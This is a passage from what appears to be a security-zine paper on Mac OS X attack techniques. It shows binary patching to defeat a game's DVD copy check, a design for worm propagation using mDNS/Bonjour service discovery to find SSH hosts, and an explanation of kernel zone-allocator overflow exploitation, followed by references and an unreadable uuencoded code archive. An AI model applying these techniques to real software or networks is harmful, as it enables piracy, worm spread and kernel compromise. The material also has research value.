+was in the drive, SUCCESS! After playing the game for about 10
+minutes and running through the same boring corridor over and 
+over again I decided it was more fun to continue cracking the
+game than to actually play it. I exited the game and returned 
+to my shell.
+
+In order to modify the binary I used the HT Editor. [15] 
+Before I could use HTE to modify this file however, I had to
+extract the appropriate architecture for my system from the
+Universal binary. I accomplished this using the ditto command
+as follows.
+
+-[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ ditto -arch i386 Prey Prey.i386
+-[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ cp Prey Prey.backup
+-[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ cp Prey.i386 Prey
+
+I then loaded the file in HTE. I pressed F6 to select the mode
+and chose the Mach-O/header option. I then scrolled down to
+find the __mod_init_func section. This is shown as follows:
+
+**** section 3 ****                                              
+section name                                      __mod_init_func         
+segment name                                      __DATA                  
+virtual address                                   00515cec                
+virtual size                                      00000380                
+file offset                                       00514cec                
+alignment                                         00000002                
+relocation file offset                            00000000                
+number of relocation entries                      00000000                
+flags                                             00000009                
+reserved1                                         00000000                
+reserved2                                         00000000              
+
+In order to skip the first constructor I simply added four
+bytes to the virtual address field, and subtracted four 
+bytes from the size. I did this by pressing F4 in HTE and 
+typing the values. Here is the new values:
+
+**** section 3 ****                                             
+section name                                      __mod_init_func         
+segment name                                      __DATA                  
+virtual address                                   00515cf0 <== += 4     
+virtual size                                      0000037c <== -= 4     
+file offset                                       00514cec                
+alignment                                         00000002                
+relocation file offset                            00000000                
+number of relocation entries                      00000000                
+flags                                             00000009                
+reserved1                                         00000000                
+reserved2                                         00000000               
+
+I then saved this new binary and executed it, again Prey
+started up fine without mentioning the missing DVD.
+
+Finally I repeated this process for the PowerPC binary
+and packed the two back together into a Universal binary
+using the lipo command.
+
+--[ 9 - Passive malware propagation with mDNS
+
+As I'm sure all of you are aware, the only reason for the 
+lack of malware on Mac OS X is due to the lack of market
+share (And therefore lack of people caring). 
+
+In this section I propose a way to remedy this. This method
+utilizes one of the default services which ships on Mac OS X
+10.4 at the time of writing: mDNSResponder. 
+
+The mDNSResponder service is an implementation of the 
+multicast DNS protocol. This protocol is documented
+thoroughly by several of the documents linked from [17].
+Also if you're interested in the protocol it makes sense
+to read the RFC [18].
+
+At a packet level the multicast DNS protocol is very similar
+to regular DNS. It also serves a similar (yet different) 
+purpose: mDNS is used to create a way for hosts on a LAN
+to automagically configure their network settings and begin
+communication without a DHCP server on the network. It is 
+also designed to allow the services on a network to be 
+browsable.
+
+Recently, mDNS implementations have been shipping for a large
+variety of operating systems, including Mac OS X, Vista, Linux
+and a variety of hardware devices such as printers. The mDNS
+implementation which is packaged with Mac OS X is called 
+Bonjour.
+
+Bonjour contains a useful API for registering and browsing
+services advertised by mDNS. The daemon mDNSResponder is
+responsible for all the network communication via a mach port
+named "com.apple.mDNSResponder" that is made available to the 
+system for communication with the daemon. The documentation
+for the API which is used to manipulate this daemon is found 
+at [19]. 
+
+The command line tool /usr/bin/mdns also exists for manipulating 
+the mDNSResponder daemon directly [20].  This tool has the following 
+functionality:
+
+-[nemo@fry:~]$ mdns
+mdns -E                  (Enumerate recommended registration domains)
+mdns -F                      (Enumerate recommended browsing domains)
+mdns -B        <Type> <Domain>        (Browse for services instances)
+mdns -L <Name> <Type> <Domain>           (Look up a service instance)
+mdns -R <Name> <Type> <Domain> <Port> [<TXT>...] (Register a service)
+mdns -A                      (Test Adding/Updating/Deleting a record)
+mdns -U                                  (Test updating a TXT record)
+mdns -N                             (Test adding a large NULL record)
+mdns -T                            (Test creating a large TXT record)
+mdns -M      (Test creating a registration with multiple TXT records)
+mdns -I   (Test registering and then immediately updating TXT record)
+
+Here is an example demonstrating using this tool to look for SSH 
+instances:
+
+-[nemo@fry:~]$ mdns -B _ssh._tcp. 
+Browsing for _ssh._tcp.local
+Talking to DNS SD Daemon at Mach port 3843
+Timestamp     A/R Flags Domain              Service Type     Instance Name
+11:16:45.816  Add     1 local.              _ssh._tcp.               fry
+
+As you can see, this functionality would be very useful for 
+malware installed on a new host. 
+
+Once a worm has compromised a new host, it must then scan for
+new targets to attack. This scanning is one of the most common
+ways for a worm to be detected on a network. In the case of 
+Mac OS X, where a large amount of scanning would be required to
+find a single target, this will more likely be the case. 
+
+We can use the Bonjour API to wait silently for a service to 
+advertise itself to our code, then infect the target as 
+necessary. This will greatly reduce the network traffic 
+required for worm propogation.
+
+The header file which contains the definition for the structs
+and functions needed is /usr/include/dns_sd.h. The functions
+needed are contained within libSystem and are therefor linked with
+almost every binary on the system. This is good news if you have
+just infected a new process and wish to perform the mDNS lookup
+from inside it's address space.
+
+The Bonjour API allows us to register a service, enumerate 
+domains as well as many other useful things. I will only 
+focus on browsing for an instance of a particular type of 
+service in this paper, however. This is a relatively 
+straight forward process. 
+
+The first function needed to find an instance of a service is the
+DNSServiceBrowse() function (shown below).
+
+DNSServiceErrorType DNSServiceBrowse ( 
+    DNSServiceRef *sdRef, 
+    DNSServiceFlags flags, 
+    uint32_t interfaceIndex, 
+    const char *regtype, 
+    const char *domain, /* may be NULL */
+    DNSServiceBrowseReply callBack, 
+    void *context /* may be NULL */
+);  
+
+The arguments to this are fairly straight forward. We simply 
+pass an uninitialized DNSServiceRef pointer, followed by an
+unused flags argument. The interfaceIndex specifies the 
+interface on which to perform the query. Setting this to 0 
+results on this query broadcasting on all interfaces. The
+ regtype field is used to specify the type of service we wish
+to browse for. In our example we will search for ssh. So the 
+string "_ssh._tcp" is used to specify ssh over tcp. Next the
+domain argument is used to specify the logical domain we wish 
+to browse. If this argument is NULL, the default domains are 
+used. Finally a callback must be supplied in order to indicate
+what to do once an instance is found. This function can include
+our infection/propagation code. 
+
+Once the call to DNSServiceBrowse() has been made, the function
+DNSServiceProcessResult() must be used to begin processing.
+
+This function simply takes the sdRef, initialized from the 
+first call to DNSServiceBrowse(), and calls the callback 
+function when results are received. It will block until 
+finding an instance. 
+
+Once a service is found, it must be resolved to an IP address
+and port so it can be infected.
+
+To do this the DNSServiceResolve() function can be used.
+This function is very similar to the DNSServiceBrowse()
+function, however a DNSServiceResolveReply() callback
+is used. Also the name of the service must already be
+known. The function prototype is as follows;
+
+	DNSServiceErrorType DNSServiceResolve ( 
+	    DNSServiceRef *sdRef, 
+	    DNSServiceFlags flags, 
+	    uint32_t interfaceIndex, 
+	    const char *name, 
+	    const char *regtype, 
+	    const char *domain, 
+	    DNSServiceResolveReply callBack, 
+	    void *context /* may be NULL */
+	);  
+
+The callback for this function receives the following
+arguments:
+
+	DNSServiceResolveReply resolve_target(
+	    DNSServiceRef sdRef,
+	    DNSServiceFlags flags,
+	    uint32_t interfaceIndex,
+	    DNSServiceErrorType errorCode,
+	    const char *fullname,
+	    const char *hosttarget,
+	    uint16_t port,
+	    uint16_t txtLen,
+	    const char *txtRecord,
+	    void *context
+	);
+
+Once again we must call the DNSServiceProcessResult() 
+function, passing the sdRef received from DNSServiceResolve
+to begin processing. 
+
+Once within the callback, the port which the service runs
+on is passed in as a short in network byte order. 
+
+Retrieving the IP address is simply a case of calling
+gethostbyname() on the hosttarget argument.
+
+I have included some code in the Appendix (discover.c)
+which demonstrates this clearly. This code can sit in a
+loop to enumerate each of the services and infect them.
+
+Opensshd warez not included. ;-)
+
+--[ 10 - Kernel Zone Allocator exploitation
+
+A zone allocator is a memory allocator which is designed 
+for efficient allocation of objects of identical size. 
+
+In this section I will look at how the mach zone allocator,
+(the zone allocator used by the XNU kernel) works. Then I 
+will look at how an overflow into the pages used by the zone 
+allocator can be exploited.
+
+The source for the mach zone allocator is located in the file 
+xnu/osfmk/kern/zalloc.c. 
+
+Some of objects in the XNU kernel which use the mach zone 
+allocator for allocation are; The task structs, the thread 
+structs, the pipe structs and the zone structs themselves.
+
+A list of the current zones on the system can be retrieved 
+from userspace using the host_zone_info() function. Mac OS X
+ships with a tool which takes advantage of this:
+
+	/usr/bin/zprint
+
+This tool displays each of the zones and their element size,
+current size, max size etc. Here is some sample output from
+running this program.
+
+elem    cur    max    cur    max   cur alloc alloc
+zone name                size   size   size  #elts  #elts inuse  size count
+---------------------------------------------------------------------------
+zones                    80    11K    12K    152    153    95    4K    51  
+vm.objects              136  3609K  3888K  27180  29274 21116    4K    30 C
+vm.object.hash.entries   20   374K   512K  19176  26214 17674    4K   204 C
+...
+tasks                   432    59K   432K    141   1024   113   20K    47 C
+threads                 868   329K  2172K    389   2562   295   56K    66 C
+...
+uthreads                296   114K   740K    396   2560   296   16K    55 C
+alarms                   44     3K     4K     93     93     2    4K    93 C
+load_file_server         36    56K   492K   1605  13994  1605    4K   113  
+mbuf                    256     0K  1024K      0   4096     0    4K    16 C
+socket                  344    38K  1024K    114   3048    75   20K    59 C
+
+It also gives you a chance to see some of the different types
+of objects which utilize the zone allocator.
+
+Before I demonstrate how to exploit an overflow into these
+zones, we will first look at how the zone allocator functions.
+
+When the kernel wishes to start allocating objects within a zone
+the zinit() function is first called. This function is used to
+allocate the zone which will contain each member of that 
+specific object type. The information about the newly created
+zone needs a place to stay. The "struct zone" struct is used to
+accommodate this information. The definition of this struct is 
+shown below.
+
+struct zone {
+        int             count;          /* Number of elements used now */
+        vm_offset_t     free_elements;
+        decl_mutex_data(,lock)          /* generic lock */
+        vm_size_t       cur_size;       /* current memory utilization */
+        vm_size_t       max_size;       /* how large can this zone grow */
+        vm_size_t       elem_size;      /* size of an element */
+        vm_size_t       alloc_size;     /* size used for more memory */
+        unsigned int
+        /* boolean_t */ exhaustible :1, /* (F) merely return if empty? */
+     /* boolean_t */ collectable :1, /* (F) garbage collect empty pages */
+     /* boolean_t */ expandable :1,  /* (T) expand zone (with message)? */
+        /* boolean_t */ allows_foreign :1,/* (F) allow non-zalloc space */
+        /* boolean_t */ doing_alloc :1, /* is zone expanding now? */
+   /* boolean_t */ waiting :1,     /* is thread waiting for expansion? */
+/* boolean_t */ async_pending :1,   /* asynchronous allocation pending? */
+        /* boolean_t */ doing_gc :1;    /* garbage collect in progress? */
+        struct zone *   next_zone;      /* Link for all-zones list */
+        call_entry_data_t       call_async_alloc;  
+	/* callout for asynchronous alloc */
+        const char      *zone_name;     /* a name for the zone */
+#if     ZONE_DEBUG
+        queue_head_t    active_zones;   /* active elements */
+#endif  /* ZONE_DEBUG */
+};
+
+The first thing that the zinit() function does is check if there is
+an existing zone in which to store the new zone struct. The 
+global pointer "zone_zone" is used for this. If the mach zone
+allocator has not yet been used, the zget_space() function is
+used to allocate more space for the zones zone (zone_zone).
+
+The code which performs this check is as follows:
+
+        if (zone_zone == ZONE_NULL) {
+                if (zget_space(sizeof(struct zone), (vm_offset_t *)&z)
+                    != KERN_SUCCESS)
+                        return(ZONE_NULL);
+        } else
+                z = (zone_t) zalloc(zone_zone);
+
+If the zone_zone exists, the zalloc() function is used to 
+retrieve an element from the zone. Each of the attributes
+of this new zone is then populated.
+
+        z->free_elements = 0;
+        z->cur_size = 0;
+        z->max_size = max;
+        z->elem_size = size;
+        z->alloc_size = alloc;
+        z->zone_name = name;
+        z->count = 0;
+        z->doing_alloc = FALSE;
+        z->doing_gc = FALSE;
+        z->exhaustible = FALSE;
+        z->collectable = TRUE;
+        z->allows_foreign = FALSE;
+        z->expandable  = TRUE;
+        z->waiting = FALSE;
+        z->async_pending = FALSE;
+
+As you can see, The free_elements linked list is 
+initialized to 0. The zone_init() function returns
+a zone_t pointer which is used for each allocation
+of new objects with zalloc(). Before returning 
+zinit() uses the zalloc_async() function to allocate
+and free a single element in the zone.
+
+Now that the zone is set up, the zalloc() and zfree()
+functions are used to allocate and free elements from 
+the zone. Also zget() is used to perform a non-blocking
+allocation from the zone.
+
+Firstly I will look at the zalloc() function. zalloc()
+is basically a wrapper function around the 
+zalloc_canblock() function. 
+
+The first thing zalloc_canblock() does is attempt to 
+remove an element from the zone's free_elements list
+and use it. The following macro (REMOVE_FROM_ZONE) is
+responsible for doing this.
+
+#define REMOVE_FROM_ZONE(zone, ret, type)                               \
+MACRO_BEGIN                                                             \
+        (ret) = (type) (zone)->free_elements;                           \
+        if ((ret) != (type) 0) {                                        \
+            if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0])) {      \
+                panic("A freed zone element has been modified.\n");     \
+            }                                                           \
+            (zone)->count++;                                            \
+            (zone)->free_elements = *((vm_offset_t *)(ret));            \
+        }                                                               \
+MACRO_END
+#else   /* MACH_ASSERT */
+
+As you can see, this macro simply returns the 
+free_elements pointer from the zone struct. It
+also increments the count attribute and sets the 
+free_elements attribute of the zone struct to
+the "next" free element. It does this by 
+dereferencing the current free elements address.
+This shows that the first 4 bytes of an unused 
+allocation in a zone is used as a pointer to the
+next free element. This will come in handy to us 
+later. 
+
+The check is_kernel_data_addr() is used to make 
+sure we haven't tampered with the list. The 
+definition of this check is shown below:
+
+#define is_kernel_data_addr(a)                                          \
+  (!(a) || ((a) >= vm_min_kernel_address && !((a) & 0x3)))
+
+const vm_offset_t vm_min_kernel_address = VM_MIN_KERNEL_ADDRESS;
+#define VM_MIN_KERNEL_ADDRESS ((vm_offset_t) 0x00001000)
+
+As you can see this simply checks that the address is 
+not 0, it is greater or equal to 0x1000 (which isn't 
+a problem at all) and it's word aligned. This check does 
+not really cause any trouble when exploiting an overflow
+as you'll see later.
+
+If there are no free elements in the list the 
+doing_alloc attribute of the zone is checked.
+
+This attribute is used as a lock. If a blocking 
+allocation is performed the allocator will sleep until 
+this is unset. 
+
+Once it is ok to allocate an element the 
+kernel_memory_allocate() function is used to
+allocate one. The allocation is of a fixed
+size for the zone. The kernel_memory_allocate() 
+function is used at the base level of pretty 
+much all the memory allocators present in the
+XNU kernel. It basically just uses 
+vm_page_alloc() to allocate pages. Once the
+zone allocator successfully calls this function
+zcram() is used to break the pages up into elements
+and add them to the free_elements list. Each element 
+is added in the same way zfree() does so now that 
+I have looked at the allocation process I will take
+show the workings of zfree().
+ 
+The zfree() function is used to add an element back 
+to the zone free_elements list. The first thing zfree()
+does is to make sure that an element is not being zfree()'ed
+which was never zalloc()'ed. This is done using the 
+from_zone_map() macro. This macro is defined as follows.
+
+#define from_zone_map(addr, size) \
+        ((vm_offset_t)(addr) >= zone_map_min_address && \
+	         ((vm_offset_t)(addr) + size -1) <  zone_map_max_address)
+
+In the case of an overflow however, this check is not 
+particularly important so I will move on.
+
+Next the zfree() function (if zone debugging is enabled) will
+run through and check that the element did not come from
+a different zone to the one which has been passed to zfree().
+If this is the case a kernel panic() is thrown, alerting
+on what the problem was.
+
+Next zfree() runs through all the free_elements in the zones 
+list and calls the pmap_kernel_va() function. The code which 
+does this is as follows.
+
+     for (this = zone->free_elements;
+	     this != 0;
+	     this = * (vm_offset_t *) this)
+		if (!pmap_kernel_va(this) || this == elem)
+			panic("zfree");
+
+The pmap_kernel_va() check is shown below.
+
+#define VM_MIN_KERNEL_ADDRESS ((vm_offset_t) 0x00001000)
+#define pmap_kernel_va(VA)      \
+        (((VA) >= VM_MIN_KERNEL_ADDRESS) && ((VA) <= vm_last_addr))
+
+The pmap_kernel_va check simply checks that the address
+is greater than or equal to the VM_MIN_KERNEL_ADDRESS. 
+This address is defined (above) as 0x1000, the start of 
+the first page of valid kernel memory (straight after 
+PAGEZERO). It then checks if the address is less than 
+or equal to the vm_last_addr. This is defined as 
+VM_MAX_KERNEL_ADDRESS (shown below).
+
+vm_last_addr = VM_MAX_KERNEL_ADDRESS;   /* Set the highest address
+#define VM_MAX_KERNEL_ADDRESS        ((vm_offset_t) 0xFE7FFFFF)
+#define VM_MAX_KERNEL_ADDRESS ((vm_offset_t) 0xDFFFFFFF)
+
+Basically this means that anywhere within almost the entire
+address space of the kernel is valid.  
+
+Once these checks are performed, the final step zfree() does 
+is to use the ADD_TO_ZONE() macro in order to add the free'ed 
+element back to the free_elements list in the zone struct.
+
+Here is the macro used to do this:
+
+#define ADD_TO_ZONE(zone, element)                                      \
+MACRO_BEGIN                                                             \
+                if (zfree_clear)                                        \
+                {   unsigned int i;                                     \
+                    for (i=1;                                           \
+                         i < zone->elem_size/sizeof(vm_offset_t) - 1;   \
+                         i++)                                           \
+                    ((vm_offset_t *)(element))[i] = 0xdeadbeef;         \
+                }                                                       \
+                ((vm_offset_t *)(element))[0] = (zone)->free_elements;  \
+                (zone)->free_elements = (vm_offset_t) (element);        \
+                (zone)->count--;                                        \
+MACRO_END
+
+This macro runs through the memory allocated for the 
+element which is being free()'ed in 4 byte intervals.
+It writes out 0xdeadbeef to each location, filling
+the memory. and clearing any original data. It then
+writes into the first 4 bytes of the allocation, the
+old free_elements pointer, from the zone struct. 
+
+Now that I have shown briefly how the zone allocator 
+functions I will look at what happens in the case of an
+overflow.
+
+In the diagram below you can see an element in use
+followed by a free element. The first element 
+contains the data used by the struct (in this 
+sample case the struct is made up.)
+
+The second element consists of the pointer to the 
+free element followed by the unsigned long 
+0xdeadbeef repeated to fill the struct. Both the
+in use and free elements are the same size.
+
+low memory  (0x00000000)
+----( Element being overflowed )-----
+  00 00 00 01
+  22 22 22 22
+  33 33 33 33
+  00 00 00 00 
+  00 00 00 00 
+  00 00 00 00 
+  00 00 00 00 
+-----------( Free Element )----------
+[ ff fc 7c 7d ]	<== Pointer to next free element.
+  ef be ad de
+  ef be ad de
+  ef be ad de
+  ef be ad de
+  ef be ad de
+  ef be ad de
+_____________________________________
+high memory (0xffffffff)
+
+In the case where a buffer within the first
+in use struct is overflown, (in this case with
+capital A [0x41])  it is then possible to overwrite
+the free elements "next" pointer. This is 
+demonstrated below.
+ 
+low memory  (0x00000000)
+----( Element being overflowed )-----
+  00 00 00 01
+  22 22 22 22
+  33 33 33 33
+  41 41 41 41 <== Overflow starts here
+  41 41 41 41 
+  41 41 41 41 
+  41 41 41 41 
+-----------( Free Element )----------
+[ 41 41 41 41 ]	<== Overflow into pointer.
+  ef be ad de
+  ef be ad de
+  ef be ad de
+  ef be ad de
+  ef be ad de
+  ef be ad de
+_____________________________________
+high memory (0xffffffff)
+
+In this case, when the REMOVE_FROM_ZONE() macro
+is used by zalloc() the user controlled address
+0x41414141 will become the zone struct's new 
+free_elements pointer, and consequently, be
+used by the next allocation of the element type.
+
+If this address is positioned correctly it may be
+possible to have something user controlled overwrite
+a useful pointer in kernel space and in this way gain
+control of execution. 
+
+Due to the checks performed on zfree() it is 
+recommended that efforts should be taken to avoid 
+this element being passed to zfree() however.
+As this will result in a kernel panic().
+
+--[ 11 - Conclusion
+ 
+Hopefully if you bothered to read this far you learned 
+something useful. If not, I apologize.
+
+If you take any of these ideas and work on them further
+or know of a better method to do anything covered in this
+paper I'd appreciate an email letting me know at:
+nemo@felinemenace.org. Flames to mercy@felinemenace.org 
+please ;)
+
+Now for the thanks. A huge thankyou to my amazing fiancee pif 
+for her love and support while i was writing this.
+Thanks to bk for all the help and long conversations about XNU. 
+Thanks to everyone at felinemenace for all the support, code 
+and fun times. Also a big thank you to my computer for not 
+kernel panic()'ing for a third time during the process of 
+saving this paper. I think if you had written random bytes 
+over the paper a third time I wouldn't have had the stamina 
+to rewrite (again).
+
+Finally, this paper isn't complete without another bad Star 
+Wars pun to match the title so here we go....
+
+May the fork()'s be with root...
+
+--[ 12 - References
+
+[1] b-r00t's Smashing the Mac for Fun & Profit
+	http://www.milw0rm.com/papers/44  
+[2] Smashing The Kernel Stack For Fun And Profit
+	http://www.phrack.org/archives/60/p60-0x06.txt 
+[3] Linux on-the-fly kernel patching without LKM
+	http://www.phrack.org/archives/58/p58-0x07
+[4] Mach-O Runtime 
+	http://developer.apple.com/documentation/DeveloperTools/ ...
+	Conceptual/MachORuntime/MachORuntime.pdf
+[5] Understanding windows shellcode
+	http://www.hick.org/code/skape/papers/win32-shellcode.pdf
+[6] Smashing The Kernel Stack For Fun And Profit
+	http://www.phrack.org/archives/60/p60-0x06.txt
+[7] Ilja's blackhat talk - 
+	http://www.blackhat.com/presentations/bh-europe-05/ ...
+	BH_EU_05-Klein_Sprundel.pdf
+[8] Mac OS X PPC Shellcode Tricks -
+	http://www.uninformed.org/?v=1&a=1&t=txt
+[9] Smashing the Stack for Fun and Profit - 
+	http://www.phrack.org/archives/49/P49-14
+[10] Radical Environmentalists by Netric -
+	http://packetstormsecurity.org/groups/netric/envpaper.pdf
+[11] Non eXecutable Stack Lovin on OSX86 -
+	http://www.digitalmunition.com/NonExecutableLovin.txt
+[12] Mach-O Infection -
+	http://felinemenace.org/~nemo/slides/mach-o_infection.ppt
+[13] Infecting Mach-O Fies
+	http://vx.netlux.org/lib/vrg01.html
+[14] class-dump
+	http://www.codethecode.com/Projects/class-dump/
+[15] HTE -
+	http://hte.sourceforge.net
+[16] Architecture Spanning Shellcode -
+	http://www.phrack.org/archives/57/p57-0x17
+[17] Multicast DNS -
+	http://www.multicastdns.org/
+[18] mDNS RFC	-
+	http://files.dns-sd.org/draft-cheshire-dnsext-nbp.txt
+[19] mDNS API - 
+	http://developer.apple.com/documentation/Networking/
+	Conceptual/dns_discovery_api/index.html
+[20] mdns command line utility -
+	http://developer.apple.com/documentation/Darwin/
+	Reference/Manpages/man1/mDNS.1.html
+[21] KUNC Reference -
+	http://developer.apple.com/documentation/DeviceDrivers/
+	Conceptual/WritingDeviceDriver/KernelUserNotification
+
+--[ 13 - Appendix - Code
+
+Extract this code with uudecode. 
+
+
+begin 644 code.tgz
+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
